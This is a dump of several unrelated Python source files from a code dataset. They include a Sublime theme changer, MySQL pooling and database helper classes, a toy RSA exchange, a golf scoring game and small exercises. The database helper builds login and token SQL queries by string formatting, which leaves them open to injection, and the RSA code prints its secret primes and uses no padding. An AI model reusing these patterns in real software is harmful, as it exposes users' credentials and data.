[Y\\\\n] \")\n if ans.startswith('y'):\n shutil.copyfile(self.pref_dir + 'Preferences.sublime-settings', self.user_config + 'Preferences.sublime-settings')\n\n def backup(self):\n # Copying the sublime preferences file to the current directory for safety\n shutil.copyfile(self.pref_dir + 'Preferences.sublime-settings', self.user_config + 'Old_Preferences.sublime-settings')\n\n def move_preferences(self, user_pref_file):\n # Copying new file to sublime preferences\n shutil.copyfile(user_pref_file, self.pref_dir + 'Preferences.sublime-settings')\n\n # Validate\n if os.path.isfile(self.pref_dir + 'Preferences.sublime-settings'):\n print(colored('Preferences Changed!', 'green'))\n else:\n print(self.error_message('Failed to change preferences'))\n\n def find_themes(self, package_dir):\n themes = {}\n\n packages = os.listdir(package_dir)\n for package in packages:\n contents = ZipFile(package_dir + package, 'r')\n contents = contents.namelist()\n for c in contents:\n if '.tmTheme' in c or '.sublime-theme' in c:\n theme_name = package[:package.find('.')]\n if theme_name not in themes:\n themes[theme_name] = []\n\n themes[theme_name].append(c)\n\n return themes\n\n def get_theme_settings(self, themes):\n os.system('clear')\n error = ''\n flag = True\n while flag:\n formatted_name = []\n curr = 1\n for theme, files in themes.items():\n print(theme + ':')\n for f in files:\n formatted = str(curr) + '. ' + f\n formatted_name.append(formatted)\n print(formatted)\n curr += 1\n\n print()\n\n if error != '':\n print(error)\n error = ''\n\n user_theme = input(\"Enter your new theme: \")\n user_color = input(\"Enter your new cholor scheme: \")\n\n for name in formatted_name:\n name_number = name[:name.find('.')]\n if name_number == user_theme:\n user_theme = name[name.find('.') + 2:]\n\n if name_number == user_color:\n user_color = name[name.find('.') + 2:]\n\n os.system('clear')\n flag = False\n if not user_theme.endswith('.sublime-theme'):\n error += self.error_message('Theme file must end with .sublime-theme!')\n flag = True\n if not user_color.endswith('.tmTheme'):\n error += self.error_message('Color scheme file must end with .tmTheme!')\n flag = True\n\n for key, value in themes.items():\n if user_theme in value:\n self.theme_package = key\n if user_color in value:\n self.color_package = key\n\n return (user_theme, user_color)\n\n def get_new_pref_file(self):\n os.system('clear')\n settings_files = os.listdir(self.user_config)\n print('Found {} files in {}'.format(len(settings_files), self.user_config))\n settings_files = os.listdir(self.user_config)\n curr = 1\n formatted_name = []\n for f in settings_files:\n formatted = str(curr) + '. ' + f\n formatted_name.append(formatted)\n print(formatted)\n curr += 1\n\n user_file = input(\"\\nEnter the file you would like to use for your preferences: \")\n\n for name in formatted_name:\n name_number = name[:name.find('.')]\n if name_number == user_file:\n user_file = name[name.find('.') + 2:]\n\n return self.user_config + user_file\n\n def update_user_pref_file(self, user_pref_file, themes):\n ans = input(\"Would you like to change the theme and color scheme of the preference file? 
[Y\\\\n] \")\n if not ans.startswith('y'):\n return\n\n user_theme, user_color = self.get_theme_settings(themes)\n\n with open(user_pref_file, mode='r+') as file:\n old_pref = file.readlines()\n file.seek(0)\n file.truncate() # clears file contents\n file.seek(0)\n for line in old_pref:\n if '\\\"color_scheme\\\"' in line:\n continue\n elif '\\\"theme\\\"' in line:\n continue\n elif '{' in line:\n file.write(line)\n file.write('\\t\\\"theme\\\": \\\"' + user_theme + '\\\",\\n')\n file.write('\\t\\\"color_scheme\\\": \\\"Packages/' + self.color_package + '/' + user_color + '\\\",\\n')\n else:\n file.write(line)\n\n def error_message(self, msg):\n return colored('\\nError: ', 'red') + msg\n\n\ntheme_changer = Theme_Changer()\ntheme_changer.validate()\nthemes = theme_changer.find_themes(theme_changer.package_dir)\nuser_pref_file = theme_changer.get_new_pref_file()\ntheme_changer.update_user_pref_file(user_pref_file, themes)\ntheme_changer.backup()\ntheme_changer.move_preferences(user_pref_file)\n","sub_path":"change_subl_settings.py","file_name":"change_subl_settings.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"108031527","text":"import pymysql\nfrom mysql_pool.sql_setting import mysqlInfo\nfrom DBUtils.PooledDB import PooledDB\n\n\nclass ConnMysql(object):\n __pool = None\n\n def __init__(self):\n # 构造函数,创建数据库连接、游标\n self.coon = ConnMysql.getmysqlconn()\n self.cur = self.coon.cursor(cursor=pymysql.cursors.DictCursor)\n\n # 数据库连接池连接\n @staticmethod\n def getmysqlconn():\n global __pool\n if ConnMysql.__pool is None:\n __pool = PooledDB(\n creator=pymysql,\n mincached=1,\n maxcached=5,\n maxconnections=6,\n maxshared=3,\n blocking=True,\n maxusage=None,\n setsession=[],\n ping=2,\n host=mysqlInfo['host'],\n user=mysqlInfo['user'],\n passwd=mysqlInfo['passwd'],\n db=mysqlInfo['db'],\n port=mysqlInfo['port'],\n charset=mysqlInfo['charset'])\n return __pool.connection()\n\n # 插入、修改、删除一条\n def sql_change_msg(self, sql):\n change_sql = self.cur.execute(sql)\n self.coon.commit()\n return change_sql\n\n # 查询一条\n def sql_select_one(self, sql):\n self.cur.execute(sql)\n select_res = self.cur.fetchone()\n return select_res\n\n # 查询多条\n def sql_select_many(self, sql, count=None):\n self.cur.execute(sql)\n if count is None:\n select_res = self.cur.fetchall()\n else:\n select_res = self.cur.fetchmany(count)\n return select_res\n\n # 释放资源\n def release(self):\n self.coon.close()\n self.cur.close()\n","sub_path":"OSS2存储_1.0/mysql_pool/sql_pool.py","file_name":"sql_pool.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298834922","text":"import threading\nimport mysql\nimport json\nimport database.model.insert as insert\n\nfrom design_patterns.singleton.singleton import Singleton\nfrom database.database_connector import DatabaseConnector\nfrom database.database_helper_exception import DatabaseHelperException\nfrom database.database_helper_exception_type import DatabaseHelperExceptionType\n\n\n\n@Singleton\nclass DatabaseHelper(DatabaseConnector):\n def __init__(self):\n self._initialize_database_connector()\n self.__INSERT_CATEGORY_SQL = self.__load_sql_question_from_file(\"sql/insert/category.sql\")\n self.__INSERT_CONTENT_SQL = self.__load_sql_question_from_file(\"sql/insert/content.sql\")\n self.__INSERT_CONTENT_WITH_SCRIPT_SQL = self.__load_sql_question_from_file(\"sql/insert/content_with_script.sql\")\n 
self.__INSERT_CONTENT_SCRIPT_SQL = self.__load_sql_question_from_file(\"sql/insert/content_script.sql\")\n        self.__INSERT_DIAMETER_SQL = self.__load_sql_question_from_file(\"sql/insert/diameter.sql\")\n        self.__INSERT_LOCALIZATION_SQL = self.__load_sql_question_from_file(\"sql/insert/localization.sql\")\n        self.__INSERT_OPENING_HOURS_SQL = self.__load_sql_question_from_file(\"sql/insert/opening_hours.sql\")\n        self.__INSERT_PREFERENCE_SQL = self.__load_sql_question_from_file(\"sql/insert/preference.sql\")\n        self.__INSERT_SERVICE_SQL = self.__load_sql_question_from_file(\"sql/insert/service.sql\")\n        self.__INSERT_SERVICE_POINT_SQL = self.__load_sql_question_from_file(\"sql/insert/service_point.sql\")\n        self.__INSERT_SERVICE_POINT_OPENING_HOUR_SQL = self.__load_sql_question_from_file(\"sql/insert/service_point_opening_hour.sql\")\n        self.__INSERT_SERVICE_UPDATE_TIME_SQL = self.__load_sql_question_from_file(\"sql/insert/service_update_time.sql\")\n        self.__INSERT_USER_SQL = self.__load_sql_question_from_file(\"sql/insert/user.sql\")\n        \n        self.__SELECT_CATEGORIES_SQL = self.__load_sql_question_from_file(\"sql/select/categories.sql\")\n        self.__SELECT_TOKEN_SQL = self.__load_sql_question_from_file(\"sql/select/token.sql\")\n        self.__SELECT_USER_SQL = self.__load_sql_question_from_file(\"sql/select/user.sql\")\n        self.__SELECT_USER_WITH_LOGIN_SQL = self.__load_sql_question_from_file(\"sql/select/finduser.sql\")\n\n        self._lock = threading.RLock()\n\n    def __load_sql_question_from_file(self, file_path):\n        try:\n            with open(file_path, \"r\") as sql_file:\n                question = sql_file.readlines()\n                question = \"\".join(question)\n                return question.lstrip().rstrip()\n        except:\n            pass\n\n    def insert_category(self, category):\n        if not isinstance(category, insert.Category):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_CATEGORY_SQL.format(*category))\n\n    def insert_content(self, content):\n        if not isinstance(content, insert.Content):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_CONTENT_SQL.format(*content))\n\n    def insert_content_script(self, content_script):\n        if not isinstance(content_script, insert.ContentScript):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_CONTENT_SCRIPT_SQL.format(*content_script))\n\n    def insert_content_with_script(self, content_with_script):\n        if not isinstance(content_with_script, insert.ContentWithScript):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_CONTENT_WITH_SCRIPT_SQL.format(*content_with_script))\n\n    def insert_diameter(self, diameter):\n        if not isinstance(diameter, insert.Diameter):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_DIAMETER_SQL.format(*diameter))\n\n    def insert_user(self, user):\n        if not isinstance(user, insert.User):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_USER_SQL.format(*user))\n\n    def insert_localization(self, localization):\n        if not isinstance(localization, insert.Localization):\n            raise ValueError(\"Argument isn't insert object\")\n        return self._execute_sql_insert_question(self.__INSERT_LOCALIZATION_SQL.format(*localization))\n\n    def insert_opening_hours(self, opening_hours):\n        if not isinstance(opening_hours, insert.OpeningHours):\n            raise ValueError(\"Argument isn't insert 
object\")\n return self._execute_sql_insert_question(self.__INSERT_OPENING_HOURS_SQL.format(*opening_hours))\n \n def insert_preference(self, preference):\n if not isinstance(preference, insert.Preference):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_PREFERENCE_SQL.format(*preference))\n\n def insert_service(self, service):\n if not isinstance(service, insert.Service):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_SQL.format(*service))\n\n def insert_service_update_time(self, service_update_time):\n if not isinstance(service_update_time, insert.ServiceUpdateTime):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_UPDATE_TIME_SQL.format(*service_update_time))\n\n def insert_service_point(self, service_point):\n if not isinstance(service_point, insert.ServicePoint):\n raise ValueError(\"Argument isn't insert object\")\n try:\n self.insert_localization(service_point.localization)\n except DatabaseHelperException as error:\n if not error.exception_type == DatabaseHelperExceptionType.DUPLICATE_ENTRY:\n raise\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_POINT_SQL.format(*service_point))\n \"\"\"\n def insert_service_point_opening_hour(self, service_point_opening_hours):\n if not isinstance(service_point_opening_hours, insert.ServicePointOpeningHours):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_SERVICE_POINT_OPENING_HOUR_SQL.format(*service_point_opening_hours))\n \"\"\"\n def insert_user(self, user):\n if not isinstance(user, insert.User):\n raise ValueError(\"Argument isn't insert object\")\n return self._execute_sql_insert_question(self.__INSERT_USER_SQL.format(*user))\n\n def __decode_data_from_database_into_json(self, columns, data):\n if len(data) == 0:\n jsondata = \"\"\n elif len(data) == 1:\n jsondata = dict()\n for i, column_value in enumerate(data[0]):\n if type(column_value) is bytearray:\n column_value = column_value.decode(\"utf-8\")\n jsondata[columns[i]] = column_value\n else:\n jsondata = list()\n for row in data:\n row_values = dict()\n for i, column_value in enumerate(row):\n if type(column_value) is bytearray:\n column_value = column_value.decode(\"utf-8\")\n row_values[columns[i]] = column_value\n jsondata.append(row_values)\n return json.dumps(jsondata)\n\n def select_categories(self):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_CATEGORIES_SQL))\n\n def select_token_for_user_with_email_and_password(self, user, password):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_TOKEN_SQL.format(user, password)))\n\n def select_user_for_token(self, token):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_USER_SQL.format(token)))\n\n def select_user_with_login(self, user):\n return self.__decode_data_from_database_into_json(*self._execute_sql_select_question(self.__SELECT_USER_WITH_LOGIN_SQL.format(user)))","sub_path":"Serwer/database/database_helper.py","file_name":"database_helper.py","file_ext":"py","file_size_in_byte":8276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"301996824","text":"from random import randint as rd\nfrom math2 import Power_by_modulus\nprimary = [2, 3, 5, 
7,11,13, 17, 19, 23, 29, 31] \ndef ExEuclid(q, w):\n\t\tif q == 0:\n\t\t\treturn (w, 0, 1)\n\t\telse:\n\t\t\tgcd, first, second = ExEuclid(w % q, q)\n\t\t\treturn (gcd, second - (w // q) * first, first)\n\n\ndef Trivial_check(dec_number):\n\tdecimal_number = dec_number\n\tglobal primary\n\tfor i in primary:\n\t\tif decimal_number % i == 0:\n\t\t\treturn False\n\treturn True\n\n\nclass User():\n\tdef __init__(self):\n\t\tself.__p = self.GeneratePN()\n\t\tself.__q = self.GeneratePN()\n\t\tprint(\"aaaaaa\",self.__p,self.__q)\n\t\tself.n = self.__p * self.__q\n\t\tself.__fi = self.FiFunction()\n\t\tself.GenerateKeyPair()\n\n\tdef GenerateRand(self,length = 128):\n\t\tbinary_number = \"\"\n\t\tfor i in range(length - 2):\n\t\t\tbinary_number += str(rd(0,1))\n\t\tbinary_number =\"1\" + binary_number[:] + \"1\"\n\t\treturn binary_number\n\n\tdef FiFunction(self):\n\t\treturn (self.__q - 1)*(self.__p - 1)\n\n\tdef GenerateKeyPair(self):\n\t\tself.e = rd(2,self.__fi - 1)\n\n\t\twhile ExEuclid(self.e,self.__fi)[0] != 1:\n\t\t\tself.e = rd(2,self.__fi - 1)\n\t\tself.__d = ExEuclid(self.e,self.__fi)[1]%self.__fi\n\t\tprint(str(hex(self.e)[2:]),\" ASDASDA \",str(hex(self.n)[2:]))\n\n\tdef Encryption(self,PlainText,receiver_e,receiver_n):\n\t\treturn Power_by_modulus(PlainText,receiver_e,receiver_n)\n\n\tdef DigitalSignature(self,PlainText):\n\t\treturn Power_by_modulus(PlainText,self.__d,self.n)\n\n\tdef SignatureVerification(self,PlainText,Digest,sender_e,sender_n):\n\t\treturn PlainText == Power_by_modulus(Digest,sender_e,sender_n)\n\n\tdef Decryption(self,CipherText):\n\t\treturn Power_by_modulus(CipherText,self.__d,self.n)\n\n\tdef SendKey(self,PainText,receiver_e,receiver_n,sender_e,sender_n):\n\t\treturn (self.Encryption(PainText,receiver_e,receiver_n),self.Encryption(self.DigitalSignature(PainText),receiver_e,receiver_n),(sender_e,sender_n))\n\n\tdef ReceiveKey(self,CipherText,DigitalSignature,senders_public):\n\t\tPainText = self.Decryption(CipherText)\n\t\tprint(PainText)\n\t\tDS = self.SignatureVerification(PainText,self.Decryption(DigitalSignature),senders_public[0],senders_public[1])\n\t\tif DS:\n\t\t\treturn (PainText,DS)\n\t\treturn None\n\n\tdef PrimaryTestMillera_Rabina(self,dec_number):\n\t\tk = 0\n\t\tdecimal_number = dec_number - 1\n\t\tdecimal = decimal_number + 1\n\t\td,s = 0,0\n\t\twhile not(decimal_number % 2 == 1):\n\t\t\tdecimal_number = decimal_number // 2\n\t\t\ts = s + 1\n\t\td = int(decimal_number)\n\t\twhile k != 5:\n\t\t\tx = rd(2,decimal - 1)\n\t\t\tif ExEuclid(decimal,x)[0] != 1:\n\t\t\t\treturn False\n\t\t\tif Power_by_modulus(x, d, decimal) in [-1 % decimal,1]:\n\t\t\t\tk += 1\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcheck = False\n\t\t\t\tfor i in range(1,s):\n\t\t\t\t\tr = Power_by_modulus(x,d * pow(2,i), decimal)\n\t\t\t\t\tif r == 1:\n\t\t\t\t\t\treturn False\n\t\t\t\t\tif r == -1 % decimal:\n\t\t\t\t\t\tcheck = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not check :\n\t\t\t\t\treturn False\n\t\t\tk += 1\n\t\treturn decimal\n\n\t\n\tdef GeneratePN(self):\n\t\tp = int(\"\".join(self.GenerateRand()),2) - 2\n\t\twhile True:\n\t\t\tp += 2\n\t\t\tprint(p)\n\t\t\t#if not Trivial_check(p):\n\t\t\t#\tcontinue\n\t\t\tadvanced_p = self.PrimaryTestMillera_Rabina(p)\n\t\t\tif advanced_p :\n\t\t\t\treturn advanced_p\n\n\na = User()\nSite_public_n = int(\"D499BB1FEA2F8BB3DD8FF84D056BC297DF552EECCC01CD607793CEDD534DD3C7\",16)\nprint(Site_public_n,\" DD\")\nSite_public_e = int('10001', 16)\nwhile a.n > Site_public_n:\n\t\n\ta = User()\n\ntpl = 
a.SendKey(772236207544142343524988776290862243162112092754627934242299,Site_public_e,Site_public_n,a.e,a.n)\nprint(\"AAAAAAAAAAAAAAA \",str(hex(tpl[0])[2:]))\nprint(\"DS \",str(hex(tpl[1])[2:]))\n#print(tpl)\n#print(b.ReceiveKey(tpl[0],tpl[1],tpl[2]))\n#print(b.Decryption(a.Encryption(2,b.e,b.n)))\n\n","sub_path":"cp_5/korol_fb-72_stepanets_fb-72_cp5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"174995582","text":"\"\"\" game.py - GolfGame class.\"\"\"\nfrom .game import GolfGame\nfrom .exceptions import GolfException\n\n\nclass SixPointGame(GolfGame):\n \"\"\"Six point golf game.\"\"\"\n\n short_description = \"Six Point\"\n description = \"\"\"\nIn the Six Point Game, three players compete for six points per hole.\nBefore the game, the players should agree to how much each point is worth\n(consider that a player who never wins a point on any hole will owe about 100 points to his/her friends).\n\nHandicaps are used in this game - the best player plays as scratch, and the other two players receive the\nsame number of strokes as the difference between their and the best player's course handicap. \n\nOn each hole, the points can break down in four ways (as mentioned above, the scores on each hole are adjusted by the players' handicaps):\nIf there is a clear winner on the hole, that player wins 4 points. The golfer who finishes second receives 2 points, and the last place golfer receives nothing (4-2-0).\nIf two golfers tie for second they each receive 1 point, and the clear winner receives 4 points. (4-1-1).\nIf two golfers tie for lowest score, they win 3 points each, and the golfer with the high score receives nothing (3-3-0).\nIf all three golfers tie the hole, they each receive 2 points (2-2-2).\nAt the end of the match, all the points are totaled, with the low-point-total player paying both the other players a sum based on the difference between their final point totals. 
The player with the second highest point total also pays the high-point player based on the difference between their point totals.\n\"\"\"\n POINTS_WIN_1ST = 4\n POINTS_TIE_1ST = 3\n POINTS_WIN_2ND = 2\n POINTS_TIE_2ND = 1\n POINTS_ALL_TIE = 2\n POINTS_3RD = 0\n TITLE = \"Six Point\"\n NAME = \"six_point\"\n\n def validate(self):\n if len(self.scores) != 3:\n raise GolfException(\n \"Six point game must have 3 players, {} found.\".format(len(self.scores))\n )\n\n def start(self):\n \"\"\"Start the skins game.\"\"\"\n # find min handicap in all players\n min_handicap = min([gs.course_handicap for gs in self.scores])\n for sc in self.scores:\n # net start\n sc._score = [None for _ in range(len(self.golf_round.course.holes))]\n sc._bumps = self.golf_round.course.calcBumps(\n sc.course_handicap - min_handicap\n )\n sc._points = [None for _ in range(len(self.golf_round.course.holes))]\n sc._in = 0\n sc._out = 0\n sc._total = 0\n self.dctScorecard[\"header\"] = \"{0:*^98}\".format(\" {} \".format(self.TITLE))\n self.dctLeaderboard[\"hdr\"] = \"Pos Name Points Thru\"\n\n def addScore(self, index, lstGross):\n \"\"\"add scores for a hole.\"\"\"\n # update net values\n for gs, gross in zip(self.scores, lstGross):\n gs._score[index] = gross - gs._bumps[index]\n # Determine net standings on this hole\n net_scores = [[n, sc._score[index], 0, 0] for n, sc in enumerate(self.scores)]\n net_scores = sorted(net_scores, key=lambda sc: sc[1])\n pos = 1\n prev_total = None\n for lst in net_scores:\n if prev_total != None and lst[1] > prev_total:\n pos += 1\n prev_total = lst[1]\n lst[2] = pos\n rank = [lst[2] for lst in net_scores]\n if rank.count(1) == 3:\n # 2,2,2\n for lst in net_scores:\n lst[3] = self.POINTS_ALL_TIE\n elif rank.count(1) == 2:\n # 3,3,0\n for lst in net_scores[:2]:\n lst[3] = self.POINTS_TIE_1ST\n net_scores[2][3] = self.POINTS_3RD\n else:\n # 1 winner\n net_scores[0][3] = self.POINTS_WIN_1ST\n # tie for 2nd\n if rank.count(2) == 2:\n for lst in net_scores[1:]:\n lst[3] = self.POINTS_TIE_2ND\n else:\n net_scores[1][3] = self.POINTS_WIN_2ND\n net_scores[2][3] = self.POINTS_3RD\n # put points\n for lst, sc in zip(net_scores, self.scores):\n # print lst\n self.scores[lst[0]]._points[index] = lst[3]\n for sc in self.scores:\n sc._out = sum([point for point in sc._points[:9] if isinstance(point, int)])\n sc._in = sum([point for point in sc._points[9:] if isinstance(point, int)])\n sc._total = sc._in + sc._out\n\n def getScorecard(self, **kwargs):\n \"\"\"Scorecard with all players.\"\"\"\n lstPlayers = []\n for n, sc in enumerate(self.scores):\n dct = {\"player\": sc.player}\n dct[\"in\"] = sc._in\n dct[\"out\"] = sc._out\n dct[\"total\"] = sc._total\n line = \"{:<6}\".format(sc.player.nick_name)\n for point in sc._points[:9]:\n line += \" {:>3}\".format(point if point != None else \"\")\n line += \" {:>4d}\".format(sc._out)\n for point in sc._points[9:]:\n line += \" {:>3}\".format(point if point != None else \"\")\n line += \" {:>4d} {:>4d}\".format(sc._in, sc._total)\n dct[\"line\"] = line\n lstPlayers.append(dct)\n self.dctScorecard[\"players\"] = lstPlayers\n return self.dctScorecard\n\n def getLeaderboard(self, **kwargs):\n board = []\n scores = sorted(self.scores, key=lambda score: score._total, reverse=True)\n pos = 1\n prev_total = None\n for sc in scores:\n score_dct = {\"player\": sc.player, \"total\": sc._total}\n if prev_total != None and score_dct[\"total\"] < prev_total:\n pos += 1\n\n prev_total = score_dct[\"total\"]\n score_dct[\"pos\"] = pos\n for n, point in 
enumerate(sc._points):\n                if point is None:\n                    break\n            else:\n                n += 1\n            score_dct[\"thru\"] = n\n            score_dct[\"line\"] = \"{:<3} {:<6} {:>+5} {:>4}\".format(\n                score_dct[\"pos\"],\n                score_dct[\"player\"].nick_name,\n                score_dct[\"total\"],\n                score_dct[\"thru\"],\n            )\n            board.append(score_dct)\n        self.dctLeaderboard[\"leaderboard\"] = board\n        return self.dctLeaderboard\n\n    def getStatus(self, **kwargs):\n        for n, net in enumerate(self.scores[0]._score):\n            if net is None:\n                self.dctStatus[\"next_hole\"] = n + 1\n                self.dctStatus[\"par\"] = self.golf_round.course.holes[n].par\n                self.dctStatus[\"handicap\"] = self.golf_round.course.holes[n].handicap\n                bumps = []\n                bump_line = []\n                for sc in self.scores:\n                    if sc._bumps[n] > 0:\n                        dct = {\"player\": sc.player, \"bumps\": sc._bumps[n]}\n                        bumps.append(dct)\n                        bump_line.append(\n                            \"{}{}\".format(\n                                sc.player.nick_name,\n                                \"({})\".format(dct[\"bumps\"]) if dct[\"bumps\"] > 1 else \"\",\n                            )\n                        )\n                self.dctStatus[\"bumps\"] = bumps\n                self.dctStatus[\"line\"] = \"Hole {} Par {} Hdcp {}\".format(\n                    self.dctStatus[\"next_hole\"],\n                    self.dctStatus[\"par\"],\n                    self.dctStatus[\"handicap\"],\n                )\n                if bumps:\n                    self.dctStatus[\"line\"] += \" Bumps:{}\".format(\",\".join(bump_line))\n                self.dctStatus[\"line\"] += \" Points:{},{},{}\".format(\n                    self.POINTS_WIN_1ST, self.POINTS_WIN_2ND, self.POINTS_3RD\n                )\n                break\n        else:\n            # round complete\n            self.dctStatus[\"next_hole\"] = None\n            self.dctStatus[\"par\"] = self.golf_round.course.total\n            self.dctStatus[\"handicap\"] = None\n            self.dctStatus[\"line\"] = \"Round Complete\"\n        return self.dctStatus\n","sub_path":"golf_db/game_six_point.py","file_name":"game_six_point.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"370463190","text":"import numpy as np\n\nfile=open('energies.txt')\ndata=[]\nfor line in file:\n    # map() returns a lazy iterator in Python 3; materialise it so np.array\n    # builds a numeric 2-D array instead of an array of map objects\n    data.append(list(map(float,line.split()[1:])))\n\ndata = np.array(data)\n\ntemp = data[:,11]\n\n# plot things in matplotlib\n","sub_path":"validation/adsorption/simulation/parse_lines.py","file_name":"parse_lines.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"418822617","text":"\"\"\"\nbreak\n\n\nThe given code uses an infinite loop to continuously take user input.\nDuring each iteration, the user input is added to the items list.\n\nChange the code to end the loop when the user enters 0.\nOutput the resulting list after the while loop ends.\n\nSample Input\n1\n2\n3\n0\n\nSample Output\n[1, 2, 3]\n\"\"\"\n\nitems = []\n\nwhile True:\n    \n    n = int(input())\n    \n    if n==0:\n        break\n\n    items.append(n)\n\n\nprint(items)","sub_path":"3. 
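# A minimal standalone sketch of the per-hole point split described in the Six Point
# docstring above (4-2-0, 4-1-1, 3-3-0, 2-2-2). The function name and the test values
# are illustrative assumptions, not part of the original golf_db module.
def six_point_split(net_scores):
    # rank the three net scores; tied scores share the same points
    s = sorted(net_scores)
    if s[0] == s[1] == s[2]:
        pts = {s[0]: 2}                     # 2-2-2: all three tie
    elif s[0] == s[1]:
        pts = {s[0]: 3, s[2]: 0}            # 3-3-0: two tie for lowest
    elif s[1] == s[2]:
        pts = {s[0]: 4, s[1]: 1}            # 4-1-1: two tie for second
    else:
        pts = {s[0]: 4, s[1]: 2, s[2]: 0}   # 4-2-0: clear winner, second, last
    return [pts[score] for score in net_scores]

assert six_point_split([3, 4, 5]) == [4, 2, 0]
assert six_point_split([4, 4, 5]) == [3, 3, 0]
assert six_point_split([3, 5, 5]) == [4, 1, 1]
assert six_point_split([4, 4, 4]) == [2, 2, 2]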
Control Structures/InfiniteLoops.py","file_name":"InfiniteLoops.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"256159008","text":"\"\"\"\nName: vizop_parser\n\"\"\"\nfrom faulttree import FTColumnInCore\n\n\"\"\"[----------TEMPLATE---------- \"\"\"\n\"\"\" ----------TEMPLATE----------]\"\"\" \n\n\"\"\"[----------IMPORT---------- \"\"\"\n\"\"\"\"\"\"\nimport xml.etree.ElementTree as ET\nimport xml\nimport string\nimport inspect\nimport projects, core_classes, faulttree, info\n\"\"\" ----------IMPORT----------]\"\"\" \n\n\"\"\"[----------CHARACTER CHECK---------- \"\"\"\nclass Chars:\n\t#Avoid sensitive/unparsable symbol\n\tVALID_CHARS = \"!#$%()*+,-.:;=?@[]^_`{|}~ %s%s\" + string.ascii_letters + string.digits\n\"\"\" ----------CHARACTER CHECK----------]\"\"\"\n\n\"\"\"[----------UTIL---------- \"\"\"\ndef pS(inputString, trimString = True, filterForbiddenChar = True, noSpace = False) -> str:\n\t# process string\n\tassert type(inputString) == str\n\tassert type(trimString) == bool\n\tassert type(filterForbiddenChar) == bool\n\tassert type(noSpace) == bool\n\t\n\tformattedString = inputString\n\tif trimString:\n\t\tformattedString = formattedString.strip()\n\t\n\tif filterForbiddenChar:\n\t\tformattedString = ''.join(c for c in formattedString if c in Chars.VALID_CHARS)\n\n\tif noSpace:\n\t\tformattedString = '_'.join(formattedString.split(' '))\n\t\n\treturn formattedString\n\ndef getNumberOfInstance(input_class):\n\t# get the number of instance for a Class by using garbage collector\n\timport gc\n\treturn ('Number of {} in memory:{}'.format(input_class,len(list(filter(lambda x: isinstance(x, input_class), gc.get_objects())))))\n\ndef autoGenerateTagID(elementRoot): #void\n\t# generate unique ID for all elements\n\tprint (type(elementRoot))\n\tassert type(elementRoot) == xml.etree.ElementTree.Element, type(elementRoot)\n\n\tiD = 1\n\tfor each_Element in elementRoot.iter():\n\t\teach_Element.set('TagID', str(iD))\n\t\tiD = iD + 1\n\tpass\n\ndef isInType(StringInput, EnumClass):\n\tassert type(StringInput) == str\n\tassert inspect.isclass(EnumClass)\n\tfor t in EnumClass:\n\t\tif t.value.lower() == StringInput.lower():\n\t\t\treturn True\n\treturn False\n\ndef getTypeByValue(StringInput, EnumClass):\n\tassert type(StringInput) == str\n\tassert inspect.isclass(EnumClass)\n\tfor t in EnumClass:\n\t\tif t.value.lower() == StringInput.lower():\n\t\t\treturn t\n\treturn None\n\n\"\"\" ----------UTIL----------]\"\"\"\n\n\"\"\"[----------Project > XML---------- \"\"\"\ndef convertProjectToXml(Proj, ProjectFilename):\n\t# convert project to XML\n\t# void, convert from Project Item to pre-defined XML project\n\tassert type(Proj) == projects.ProjectItem\n\tassert type(ProjectFilename) == str\n\n\t# write XML tree to actual file\n\tMyXMLTree = ET.ElementTree() # create new XML structure\n\n\t# set the skeleton as the XML tree root element\n\tMyXMLTree._setroot(ET.fromstring(projects.XMLTreeSkeleton))\n\tMyXMLRoot = MyXMLTree.getroot()\n\n\t# create sub-elements according to project item file structure\n\n\t# ShortTitle\n\tif Proj.ShortTitle != '':\n\t\tMyXMLRoot_ShortTitle = ET.SubElement(MyXMLRoot, info.ShortTitleTag)\n\t\tMyXMLRoot_ShortTitle.text = pS(str(Proj.ShortTitle))\n\n\t# ProjNumber\n\tif Proj.ProjNumber != '':\n\t\tMyXMLRoot_ProjNumber = ET.SubElement(MyXMLRoot, info.ProjNumberTag)\n\t\tMyXMLRoot_ProjNumber.text = pS(str(Proj.ProjNumber))\n\n\t# Description\n\tif Proj.Description != 
